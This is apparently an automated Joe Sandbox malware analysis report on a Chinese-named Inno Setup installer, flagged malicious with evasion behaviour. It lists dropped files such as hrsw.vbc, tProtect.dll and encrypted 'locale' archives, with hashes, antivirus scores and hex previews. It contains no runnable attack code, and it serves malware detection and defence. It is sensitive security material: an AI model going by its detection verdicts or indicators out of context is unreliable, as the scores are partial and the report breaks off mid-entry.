C:\Program Files (x86)\Windows NT\hrsw.vbc38%VirustotalBrowse
C:\Program Files (x86)\Windows NT\tProtect.dll9%ReversingLabs
C:\Program Files (x86)\Windows NT\tProtect.dll6%VirustotalBrowse
C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp1%VirustotalBrowse
C:\Users\user\AppData\Local\Temp\is-BULE6.tmp\_isetup\_setup64.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-BULE6.tmp\update.vbc26%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-NFHOR.tmp\_isetup\_setup64.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-NFHOR.tmp\update.vbc26%ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exefalse
    		high
    https://www.remobjects.com/ps#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe, 00000000.00000003.1676606291.000000007EEDB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe, 00000000.00000003.1675936852.0000000002BA0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp, 00000001.00000000.1678022236.0000000000221000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp, 00000006.00000000.1767147398.00000000006ED000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp.0.dr, #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp.5.drfalse
      		high
      https://www.innosetup.com/#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe, 00000000.00000003.1676606291.000000007EEDB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe, 00000000.00000003.1675936852.0000000002BA0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp, 00000001.00000000.1678022236.0000000000221000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp, 00000006.00000000.1767147398.00000000006ED000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp.0.dr, #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp.5.drfalse
        		high

        World Map of Contacted IPs

        No contacted IP infos

        General Information

        Joe Sandbox version:41.0.0 Charoite
        Analysis ID:1580542
        Start date and time:2024-12-25 03:41:35 +01:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 9m 46s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Run name:Run with higher sleep bypass
        Number of analysed new started processes analysed:110
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Critical Process Termination
        Sample name:#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe
        renamed because original name is a hash value
        Original Sample Name:_1.1.4.exe
        Detection:MAL
        Classification:mal96.evad.winEXE@146/31@0/0
        EGA Information:
        • Successful, ratio: 100%
        HCA Information:
        • Successful, ratio: 74%
        • Number of executed functions: 121
        • Number of non-executed functions: 102
        Cookbook Comments:
        • Found application associated with file extension: .exe
        • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
        • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

        Warnings

        • Exclude process from analysis (whitelisted): Conhost.exe, SIHClient.exe
        • Excluded IPs from analysis (whitelisted): 4.245.163.56
        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
        • Not all processes where analyzed, report is missing behavior information
        • Report size exceeded maximum capacity and may have missing behavior information.
        • Report size exceeded maximum capacity and may have missing disassembly code.
        • Report size getting too big, too many NtCreateKey calls found.
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.

        Simulations

        Behavior and APIs

        No simulations

        Joe Sandbox View / Context

        IPs

        No context

        Domains

        No context

        ASNs

        No context

        JA3 Fingerprints

        No context

        Dropped Files

        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        C:\Program Files (x86)\Windows NT\7zr.exe#U5b89#U88c5#U52a9#U624b2.0.6.exeGet hashmaliciousUnknownBrowse
          #U5b89#U88c5#U52a9#U624b2.0.7.exeGet hashmaliciousUnknownBrowse
            #U5b89#U88c5#U52a9#U624b2.0.5.exeGet hashmaliciousUnknownBrowse
              #U5b89#U88c5#U52a9#U624b2.0.4.exeGet hashmaliciousUnknownBrowse
                #U5b89#U88c5#U52a9#U624b2.0.2.exeGet hashmaliciousUnknownBrowse
                  #U5b89#U88c5#U52a9#U624b2.0.3.exeGet hashmaliciousUnknownBrowse
                    #U5b89#U88c5#U52a9#U624b2.0.1.exeGet hashmaliciousUnknownBrowse
                      #U5b89#U88c5#U52a9#U624b2.0.6.exeGet hashmaliciousUnknownBrowse
                        #U5b89#U88c5#U52a9#U624b2.0.7.exeGet hashmaliciousUnknownBrowse

                          Created / dropped Files

                          C:\Program Files (x86)\Windows NT\7zr.exe

                          Download File
                          Process:C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp
                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):831200
                          Entropy (8bit):6.671005303304742
                          Encrypted:false
                          SSDEEP:24576:A48I9t/zu2QSM0TMzOCkY+we/86W5gXKxZ5:Ae71MzuiehWIKxZ
                          MD5:84DC4B92D860E8AEA55D12B1E87EA108
                          SHA1:56074A031A81A2394770D4DA98AC01D99EC77AAD
                          SHA-256:BA1EC2C30212F535231EBEB2D122BDA5DD0529D80769495CCFD74361803E3880
                          SHA-512:CF3552AD1F794582F406FB5A396477A2AA10FCF0210B2F06C3FC4E751DB02193FB9AA792CD994FA398462737E9F9FFA4F19F095A82FC48F860945E98F1B776B7
                          Malicious:false
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 0%
                          • Antivirus: Virustotal, Detection: 0%, Browse
                          Joe Sandbox View:
                          • Filename: #U5b89#U88c5#U52a9#U624b2.0.6.exe, Detection: malicious, Browse
                          • Filename: #U5b89#U88c5#U52a9#U624b2.0.7.exe, Detection: malicious, Browse
                          • Filename: #U5b89#U88c5#U52a9#U624b2.0.5.exe, Detection: malicious, Browse
                          • Filename: #U5b89#U88c5#U52a9#U624b2.0.4.exe, Detection: malicious, Browse
                          • Filename: #U5b89#U88c5#U52a9#U624b2.0.2.exe, Detection: malicious, Browse
                          • Filename: #U5b89#U88c5#U52a9#U624b2.0.3.exe, Detection: malicious, Browse
                          • Filename: #U5b89#U88c5#U52a9#U624b2.0.1.exe, Detection: malicious, Browse
                          • Filename: #U5b89#U88c5#U52a9#U624b2.0.6.exe, Detection: malicious, Browse
                          • Filename: #U5b89#U88c5#U52a9#U624b2.0.7.exe, Detection: malicious, Browse
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9A..} ..} ..} ...<... ...?..~ ...<..t ...?..v ...?... ...(.| ..} ... ...(.t ..K.... ..k_..~ ..K...~ ..f."._ ...R..x ...&..| ..Rich} ..........PE..L....\.d.....................N......:.............@..........................@............@.....................................x........................&.......d......................................................H............................text.............................. ..`.rdata..RZ.......\..................@..@.data...ds... ......................@....sxdata.............................@....rsrc...............................@..@.reloc..2r.......t..................@..B................................................................................................................................................................................................................................................

                          C:\Program Files (x86)\Windows NT\file.dat (copy)

                          Download File
                          Process:C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp
                          File Type:data
                          Category:dropped
                          Size (bytes):1922592
                          Entropy (8bit):7.999905915279869
                          Encrypted:true
                          SSDEEP:49152:orHW6CwzpxNH6btQf7ikPICTKJ6VYFQ08xten:oa6DlwKIiqS09n
                          MD5:8CE0A5AEBCE8B28B7AFFE857C765A0DE
                          SHA1:2B86C493D7B193E11C1A01658442BBBDE2F50261
                          SHA-256:29A7E30E2DD018E06E1CD64787C5375B62C515B4B716C99D716030242E4499C8
                          SHA-512:9870EF6582F0C1E5803CB87E1C3A3B5579A5F5000CC8C64E40043C21F42D8200B99EE32158DB76620559C8E524FAE9B14AB448F6BFD93069FA0333B674D6489D
                          Malicious:false
                          Preview:.@S........<...............l.2...A.P....}..Zz<87Fq.....x......Z=.r...g...s.....0...~7}...x.0....).F....vw.Mo1.H...3N}.n...^.G.7.t.|c.@^...M....y<v{tn.=........C.w..;f......i<.......D..=]2Gg.e.P...|m..sO.[..2X.....0.D.<..5o.w..._.j..d.B...........P.g..!iu>tM...r..i..P4E.9qQ...3..=.....L&.G.Z.U*.......B#.].t....[.......t...nIS..;.....{.N9... |..Jr:...l.....Mv..4"A+.0..j.H.0...m'j.[Oy..'J......y.."...Znk$d@H~..........t.Nme.V..{P...aq.'@l.A..3,..ty<.B..Y.............A.Kc.....W[.#.....Fl.O.....6q...n..XC....Kw.aB.t..>...Ng..q.n..h{./p...........Y+...E.....u.4..F..su..sP.d..Y*..O?$..{m..)z<h.},A.>..j0.*B....>.L\f.19.d*k....l..x..++.G.m....v.A...'~uJ..W..!.]%.@.^@.:\J|......6.....2....L.-.....Z..BZ...e..1....I..e.....<P.v...^.e...37.O.,.....TkX.$... ((.[..5..)..V..+^.V.B[.c....I..9.[..ug.T...e.f.k....{hn..5...>....a@k|i?S.)8?:.U-.....s$....!...o.k..P....r.D..I_?.....R...N8tG..........AS......~....,...e....-c.(4.$..=.....~.=9..G^B._..hX<.

                          C:\Program Files (x86)\Windows NT\hrsw.vbc

                          Download File
                          Process:C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):3621376
                          Entropy (8bit):7.006090025798393
                          Encrypted:false
                          SSDEEP:98304:UXTNS5omKHixBbVZ9yogz/lWGAxNRie71MzSRMYuefCG/gZD:U5SG7Hwke71MzxY/UZD
                          MD5:FCADEAE28FCC52FD286350DFEECD82E5
                          SHA1:48290AA098DEDE53C457FC774063C3198754A161
                          SHA-256:34063D8A5CC7DE10C1514FD21463D4E5A0E99CFAB7A8EE1168E84EDE8823EDFB
                          SHA-512:56428AFDEEE8774518FE206AE4CD017F552F947508B87785A3BD960B14364F990F54E73F01C2A5CAF9B1862DADDD634BB894882B00B60102675D63F52245A41F
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 26%
                          • Antivirus: Virustotal, Detection: 38%, Browse
                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...D.jg...........!..........................................................7...........@.........................8s.......y..<....p7.X.....................7.d?..........................h9.......................{...............................text...P........................... ..`.rdata..4...........................@..@.data...............................@....00cfg........(......T(.............@..@.tls..........(......V(.............@....voltbl.F.....(......X(..................aQ#..........(......Z(............. ..`.rsrc...X....p7.......6.............@..@.reloc..d?....7..@....7.............@..B................................................................................................................................................................................................................................................................................

                          C:\Program Files (x86)\Windows NT\is-TCRTM.tmp

                          Download File
                          Process:C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp
                          File Type:data
                          Category:dropped
                          Size (bytes):1922592
                          Entropy (8bit):7.999905915279869
                          Encrypted:true
                          SSDEEP:49152:orHW6CwzpxNH6btQf7ikPICTKJ6VYFQ08xten:oa6DlwKIiqS09n
                          MD5:8CE0A5AEBCE8B28B7AFFE857C765A0DE
                          SHA1:2B86C493D7B193E11C1A01658442BBBDE2F50261
                          SHA-256:29A7E30E2DD018E06E1CD64787C5375B62C515B4B716C99D716030242E4499C8
                          SHA-512:9870EF6582F0C1E5803CB87E1C3A3B5579A5F5000CC8C64E40043C21F42D8200B99EE32158DB76620559C8E524FAE9B14AB448F6BFD93069FA0333B674D6489D
                          Malicious:false
                          Preview:.@S........<...............l.2...A.P....}..Zz<87Fq.....x......Z=.r...g...s.....0...~7}...x.0....).F....vw.Mo1.H...3N}.n...^.G.7.t.|c.@^...M....y<v{tn.=........C.w..;f......i<.......D..=]2Gg.e.P...|m..sO.[..2X.....0.D.<..5o.w..._.j..d.B...........P.g..!iu>tM...r..i..P4E.9qQ...3..=.....L&.G.Z.U*.......B#.].t....[.......t...nIS..;.....{.N9... |..Jr:...l.....Mv..4"A+.0..j.H.0...m'j.[Oy..'J......y.."...Znk$d@H~..........t.Nme.V..{P...aq.'@l.A..3,..ty<.B..Y.............A.Kc.....W[.#.....Fl.O.....6q...n..XC....Kw.aB.t..>...Ng..q.n..h{./p...........Y+...E.....u.4..F..su..sP.d..Y*..O?$..{m..)z<h.},A.>..j0.*B....>.L\f.19.d*k....l..x..++.G.m....v.A...'~uJ..W..!.]%.@.^@.:\J|......6.....2....L.-.....Z..BZ...e..1....I..e.....<P.v...^.e...37.O.,.....TkX.$... ((.[..5..)..V..+^.V.B[.c....I..9.[..ug.T...e.f.k....{hn..5...>....a@k|i?S.)8?:.U-.....s$....!...o.k..P....r.D..I_?.....R...N8tG..........AS......~....,...e....-c.(4.$..=.....~.=9..G^B._..hX<.

                          C:\Program Files (x86)\Windows NT\locale.bin

                          Download File
                          Process:C:\Program Files (x86)\Windows NT\7zr.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):56546
                          Entropy (8bit):7.99693799156576
                          Encrypted:true
                          SSDEEP:768:jp8Uun5ODLwTs3N2Ziut+FUo4rToRydro6ahFubgvbarPtoE3DFJ3NjEdQmO64Rn:jp+noU6+fgRyGv6bwSPtoC9AdpkBSmVj
                          MD5:5E5B62F2674EFB7699D6E5680CBD498B
                          SHA1:4076C3374476B23CA83211C11E5125C963BD6DBC
                          SHA-256:C984B28BCD1D2FC0A5A40A5533BA2D685697C72208134A3A1A3772EB034CD5D5
                          SHA-512:9264CAC9EC3BCA68B9CB6960B055CC89282BF9EFA8BB032BA6AC5941690ABC63B80E0436325DDED4803F1E0FD2E246F7465F0085A6A945E95FADE9170824AB46
                          Malicious:false
                          Preview:.@S.....*.5l ................O.7..`a.we..&W..A.ZN...w...(.....@..4....~.....bE|.f.-.?.v7M..a(."g4I.d\.......W..W.OT.9.........$.e..0ijM:e..H-...w.K.CGd..Zm[...S..>...]...X.3.[...f..S..-g.vU9||I..U.Z|..Q.%3k.k7v(...._.z.5....m....Xn$>Y.Wh.z...[.O........[.C.....|9._.R.o..%.w-......p....a<v......)Sa.{$.mf._l..7W.\...*}.)....3....M......[.c<.m..x.:IK........I..r.\}.%~.V......(.V...|I.E.j+x9..u....6...3N.~...8..U.g..j.z...;..X.#...^.MHQ...y.LF...{....?.q...q...D_.a83.K.`._o.QIT1.#.1.....s7e..~...sz.{.P...{.../........2(.+.......b..D.9.[....0...>n.ML!.8.Z~........u...v..[..x......../6.x$...:.r.$.........>..#............tKF\. .O..'[V.U....U.18.I#^.vRO.2...`..Nu.34@X..&.Z..D.g.....%.d...U.....@3.._9z.*>dU.....31...|;{.u.q....p.cAh..Fu_....3*.?K&[Na...9~F....tL...>8.!DG..3/..2j...s.E.".....{|...b.:f..._9.i.n......b.W......h.V.m.R..o.3o5..../.......kD...S.i;.%O.w%..,rL.c.B.......n.....3.9.?..B.|9.4{.....3...!:u.`...5..by!..M..GL.......

                          C:\Program Files (x86)\Windows NT\locale.dat

                          Download File
                          Process:C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp
                          File Type:7-zip archive data, version 0.4
                          Category:dropped
                          Size (bytes):56546
                          Entropy (8bit):7.996937991565762
                          Encrypted:true
                          SSDEEP:1536:rpxCASR3U5V8s7XMYaoLCbuSUhxWVC8TH:dc3U5VLfLCbuSYxWVC+H
                          MD5:96191728F46632D577121843D546310C
                          SHA1:2A7EE9EDDCDAF195E2ED8D9C8A43DE7AC675A231
                          SHA-256:A077F09EB4DAEAB2982BD031083F51544D809B84ABDB1C97D78DE3DC76410032
                          SHA-512:70EC48BE8804BEDCD2F9221D51E08430CDD84A59662229AB08EF6A45EC328F618D25E883269ABD6E49A9A31AA990918501CE50E9C351766FB4DD6FF7B6508089
                          Malicious:false
                          Preview:7z..'...i..........2.......0...DD..n...^."$w.D..bM.W...UX.D..e..e}.d..o{SB...N.5....lB.._.H..X..a...v.Y,.*o*.,6....eo~(IK3.kG.T.......c....Z.W......3...7.H.9...>..n9...D..B]...#.Fz."6.a........Z..rk.\...[R...R.?..).#.//..{Y.....'....[m-.....@.....*R.5...x......^..x4.b...,|s)i.%.LZ.n....8.Y&<....q.....s....Rd....-..(..B..+...+.v.e..\.$h......n..r.|P.|..V..r...\.%-.7l.1...]....s...p..>....Np..3I.b8'_.k .4.X..4.Q..T.........X.l..n9Sm.+.t....UJy..]*...m...b.]..........k...:.'y)Ay..-.k.a^r...."..$4.he'..U!T.&.>p...m..`.1_v.,F.P../.{...Q4..!......k.B...L.p..Z.6..En...H.9.Pn.U.KQxi..p..MnT....L.{(..s.;.Mr...1.]O.)N.1ns.....&.......i...*X.K..,..b...(...".d~..A....=.C.WG..`.y.......1_.(PDl.X...P..-...:6./!..~.....w.9r...@&.9...U....#..M7.......|....7S.U m..;=].....o.......q...0W.`1......9Q%....y.)......?J.....d..w:).H$...K..r.C.au....\IA..<.iSr]...k^..q..P........E.F.w]h?.Om....!+..........O....e.JfR.Pm....a~^..)...n...L...+jd.%..e

                          C:\Program Files (x86)\Windows NT\locale2.bin

                          Download File
                          Process:C:\Program Files (x86)\Windows NT\7zr.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):56546
                          Entropy (8bit):7.996966859255975
                          Encrypted:true
                          SSDEEP:1536:crCPEbYP46GiC3q6cGOlLvjmS9UWgvy/F2QFtTVAe:iCIR913q8wjmS9bhKe
                          MD5:CEA69F993E1CE0FB945A98BF37A66546
                          SHA1:7114365265F041DA904574D1F5876544506F89BA
                          SHA-256:E834D26D571776C889E2D09892C6E562EA62CD6524D8FC625E6496A1742F5DBB
                          SHA-512:4BCBB5AD50446CD4FAD5ED3C530E29CC9DD7DDCB7B912D7C546AF8CCF7DA74BC1EEC397846BFB97858BABC9AA46BB3F3D0434F414BBC3B15B9FDBB7BF3ED59F9
                          Malicious:false
                          Preview:.@S....c...l ...............3...Q...R]..u&.(..c...o.A..q?oIS.j..O[..o..&....L)......Rm.jC,./....-=...Z.;..7..tH..f...n#.7.P#..#o..D..y....m........zH.!...M.|......Vs.^.Rb.X`....y.T.Sg....T.....E.?/.H.;h.)P.#.pz.LOG$..."L(.....?.D*.6g.J!.>.....f.....J..B..q...;w]9.v...V...$....L/m.H#..]...G....QQ..'.z.!NW~..R..y....E.)....m.k%....+....>....02../..M....b.l..f7..f?-~_..E.5.~....*.'....8?.n........x...#....9.........q.q.n...\....D.Uv9.9...P.j7P~q9[BV...>C..[F..k-UL(jfT..\..{d.v;.5.e.fb.3^+...Z|]S3G...$..H=.W..c...B...).v.D!...s...+.K...~=..l.2...X.m.-....m0.....p...>...d......e.J..gUr*4....vw.........T.cQ......\...]...Z{..q..n..'Ql.$..V.U9..j 4...9<..6i.....5.F.).k.LQ4.H...2..p.*.bQJ..4.K'C...#.%"q.u../zoXL...L...........'..g11=E.....y.8...~.Oe..X....u.M8.T.....Qq.m.........i....F.4e.([Hm.*...E....2........s. *R..{."4.x.]...-.....xQ@.z.......Bz.).[..C...T..".....q............M.X..CQ..A..........d...`S.3...e.X.....u.>.!..;k...>..

                          C:\Program Files (x86)\Windows NT\locale2.dat

                          Download File
                          Process:C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp
                          File Type:7-zip archive data, version 0.4
                          Category:dropped
                          Size (bytes):56546
                          Entropy (8bit):7.996966859255979
                          Encrypted:true
                          SSDEEP:1536:cWsX30GkPK2rw7bphKKdxDBxjqtalDFMflaX4:cZXhkPhr+TRJqtaK
                          MD5:4CB8B7E557C80FC7B014133AB834A042
                          SHA1:C42E2C861FF3ED0E6A11824E12F67A344E8F783D
                          SHA-256:3EC6A665E7861DC29A393D00EAA00989112E85C6F1B9643CA6C39578AD772084
                          SHA-512:A88E78258F7DB4AECD02F164E6A3AFCF39788E30202CF596F9858092027DDB2FDB66D751013A7ABA5201BFAFF9F2D552D345AFE21C8E1D1425ABBC606028C2E6
                          Malicious:false
                          Preview:7z..'....O; ........2.......D.X..Z.2..7nf..R..s# s..v.f.....%G..>..9..Jh.-j.r..q.2.=v..Q.....SW7....im..|.c...&...,.s....f.h...C.g~..f.7=9...,...sd....iD......cR.^...$..<....nd...S.O..E)0..SQ.AA.C..$.D.|. a.:..5.....b.....2......W.....Z.pS.b/.F.;|`...O/....@.......4.".b.(...4...,..h/.K$..r!...."..`.S...D?.":...n..f.{C..t..,/.S.0.N..M...v...(.Yn..-.)..-...N~....}..).. .j!...1H.7?R..X.....rKi....9.i[k..+.....Br\.=.k.t8...6Lmh.../.V^K.f.......*.@MM..`...,W.......E..v.H....0.W..~....I.....w....<....X.Azl.FH..6\.a..E?=..I.q.5...s...;.,J.0..J.../.w..,..n.EkN..,j....f.y&q.C}fnY..2\......0.....N!.J..H.H0.....BJ.Q..v}=......^c.'w..#...d.T1....#...2s}N.....2.%.?. ....l.).....a<5Y.s....}...2*.#s..]0h..._G....3].....7y.}.B.6...ywE....'q.....h..?p .#..Emm2..F..| .M.Rv!.v.G....1L.Kx...T...".a6.%S0..g..7.......J.vjO.{.A....B@.c.y>}.....N.+....:.L=[....._.....Y.{....F..|.w.oX..t&[.....a\.M..2.Qe.[}L.Ch[...G.S#.$9...8<..W.d1...*PH.`.....4.A.......?..g.

                          C:\Program Files (x86)\Windows NT\locale3.bin

                          Download File
                          Process:C:\Program Files (x86)\Windows NT\7zr.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):31890
                          Entropy (8bit):7.99402458740637
                          Encrypted:true
                          SSDEEP:768:rzwmoD5r754TWCxhazPt9GNgRYpSj3PsQ4yVb595nQ/:vwmolXaT9abVzP1TC
                          MD5:8622FC7228777F64A47BD6C61478ADD9
                          SHA1:9A7C15F341835F83C96DA804DC1E21FDA696BB56
                          SHA-256:4E5C193D58B43630E16B6E86C7E4382B26C9A812D6D28905DD39BC7155FEBEE1
                          SHA-512:71F31079B6C3CE72BC7238560B2CBD012A0285B6A5AC162B18EAE61A059DD3B8DBCF465225E1FB099A1E23ED7BDDF0AAE4ED7C337A10DC20E0FEEC4BC73C5441
                          Malicious:false
                          Preview:.@S......................xi.\ .~.#..:}..fy?koGL^|kH.G...........x....Tg.Y.t....~^..".L.41.....R..|.....R...C.m(.M&...q.v.$..i..U.....).PY.......O.....~..p.u.Y.......{...5^q.|a.]..@DP".`Rz}...|N.uSW.......^..o...U..z...3...bH........p.......Y`..b.t.x.F^i.<.%.r.o..?w.Z..M.fI.!.a...Zsb.+.y..W...n.....;...........|.{.@Q.....#".M...4.A).#;..r...>E..]w{.-....B...........v..`...S...sY....h.Sa)...r.3.U;n8wXq.x...@^z...%8H.Zd._..f~.....u[..q$..%......C..../].rS.....".=..<o.<S....-^"..iIX..r...D.......k.P.e...U..n.]^p..pal....E.c..+..Gc..U?s.R...p...:>..v..o2..B.Hn..q...F..3.o...%.......C......*.V..|..2.J..i.r....|;T.C6).......a..~"K....Y.....]3.{{..N...X>.1.....:?....,..T+=s...............so.;....&....Q.\K..b............k,..#l...Yb...VE.g.3v.$'.H3......w.....{f..e.....PS.tQ..*.8a....5w....\8%..c.;......q.j.t0/.8s..(9....... .S...0.o.o......f*..]....U..>N....Kc/..ka.I"O-O.!./..S".IN .....%G...........x%..ZL`Sq.;.}w.`..k.....F.........Tp..}..?t..

                          C:\Program Files (x86)\Windows NT\locale3.dat

                          Download File
                          Process:C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp
                          File Type:7-zip archive data, version 0.4
                          Category:dropped
                          Size (bytes):31890
                          Entropy (8bit):7.99402458740637
                          Encrypted:true
                          SSDEEP:768:jh43RfBLJT55mgLMoqX3gX/i69sXCuWegxJr8qF88M:qhj+I7qCKNSegPnFM
                          MD5:CE6034AFC63BB42F4E0D6CD897DFBCB8
                          SHA1:49E6E67EB36FE2CCAA42234A1DBB17AA2B1C7CC0
                          SHA-256:7B7EB1D44ED88E7C19A19CEDAA25855F6800B87EC7E76873F3EA4D6A65DAA25F
                          SHA-512:7801FA33C19D6504FF2D84453F4BB810FD579CB0C8772871F7CC53E90B835114D0221224A1743C0F5AAE76C658807CC9B4EC3BEC2CAD4AB8C3FD03203DAA7CF0
                          Malicious:false
                          Preview:7z..'....oYU@|......2.........Z....f..t.#.............tb.7E..Jo.........b.I=.Y..6(..=....^..>i.^E.."q.$&8....N...p+.p. .P.z6.b,.8kdD......'...G.R.n.&5..C..H.E..So!T^n{.a#d....z.SB........Nb.........LO+B ...iV..HH.Cc*.o@|.....Yvxb^.cW....._.........m.}.(V.i.H$....R....`.M.p......A?....._..nb..D.*RT<bUV.n].....LD.qU.....U9....]...h..y!...I....&C......g`...YahZ.q4.{.....2ZRG..f.. .M....:t .........8..Eg.....o.....h.]{..........p...M...lh.@.(R.]!B.:...b78$...b.......hc...C~....I..B<.x_OB|...<. .=NZ.....z........sjJ.....*{<..L.......^...9..^d..$d..}......#.dL'~.}....M...j.(5..@.tcVm.H..-.n...D..&....<..Z...@]./7?...[..qfW..!...v...==..d..M..om~).....C..9....c<..WUV.ed.h...]....OCt(X.H<<:.9..{5j....Nh.L.$..>..D..haP..~...............}r=!.E.ng..........9+...2.g.H3Lx.Bu....]jC...q.g.g.U.4..<........)....oo.T.c_.......X.,.@...nu......D.B(~.5....x5...............4S7B..p...Uk.0-m.VM.M@.V\.o...(......".k..w....Z.([.@.MQ.i9..."W..m...N.,.

                          C:\Program Files (x86)\Windows NT\locale4.bin

                          Download File
                          Process:C:\Program Files (x86)\Windows NT\7zr.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):74960
                          Entropy (8bit):7.99759370165655
                          Encrypted:true
                          SSDEEP:1536:x2PlxAOr0Y07RqyjjkFThaVNwDsKsNFBrFYek36pX4MDVuPFOnfIId+:QAOrf07RHjkFThaVGMLF3hNDcPFOn5s
                          MD5:950338D50B95A25F494EE74E97B7B7A9
                          SHA1:F56A5D6C40BC47869A6AE3BC5217D50EA3FC1643
                          SHA-256:87A341B968B325090EF90DFB6D130ED0A1550A1EBDE65B1002E401F1F640854A
                          SHA-512:9A6CC00276564DDE23D4CABA133223D31D9DDD06D8C5B398F234D5CE03774ED7B9C7D875543E945A5B3DB2851EC21332FE429A56744A9CC2157436400793FF83
                          Malicious:false
                          Preview:.@S........................F.T....r...z'I.N..].u.e.e..y.....<|r.:v.....J.i...L.Sv.....Nz..,..K.sI*./.d.p.'.R.....6eF....W{."J.Nt'.{E....mU_..qc.G..M..y.QF)..N..W.o.D!.-...A$.....Nc.(...~.5.9'..>...E..>.5n..s..W.A7..../..+..E.....v..^&.....V..H6..j..S`H.qAG.R.i^&....>@SYz.@......q.....\t=.HE...i..".u.Z.(y.m..3.0\..Wq9#.....iH7..TL.U..3,b........L...D..,..t(mS..06...[6.y....0-....f.N7..R......./..z.bEQ.r..n.CmB'..@......(...l..=.s........`.6.?..[mzl....K.5"..#*.>.~..._...A.%b..........PnI.T...?R~JL<.$V..-.U..}\..t/F..<..t....y(K..v..6"..'.!.*z.R....EJ0.d<v:.R&......x...2....;Tc..(..dW...7a.)...rq.....{"h.wbB..t)f..qj........~.XR.a/........l./.S......".%?.C.cL._.,k.n'....a./.z...{.]...<......._pFP..d..,......Q...[........3...Kq).rJ..8..I.)o...i'Q..=......(dq(.m../..%=.......r m.X|3.......b.~tA.......%+.T..E@..ce...%....,..x#...,....-....A...q.....r.+...?......L..%.c.... ..>.Iw......P...O)...$`.'..D1.r.....*..9;..R...VL.]..%j.....TM.4.....P.L...

                          C:\Program Files (x86)\Windows NT\locale4.dat

                          Download File
                          Process:C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp
                          File Type:7-zip archive data, version 0.4
                          Category:dropped
                          Size (bytes):74960
                          Entropy (8bit):7.997593701656546
                          Encrypted:true
                          SSDEEP:1536:xsn0ayGU0SfvuEykcv5ZUi4Q9POZBgfmWRDOs2XwV1NN4+8wbr82nR+2R:xY0ntfvwkcv5ZwYPCBgfmW/VDS+FbrLN
                          MD5:059BA7C31F3E227356CA5F29E4AA2508
                          SHA1:FA3DC96A3336903ED5E6105A197A02E618E3F634
                          SHA-256:1CBF36AFC14ECC78E133EBEC8A6EE1C93DEA85EEC472CE0FB0B57D3E093F08CC
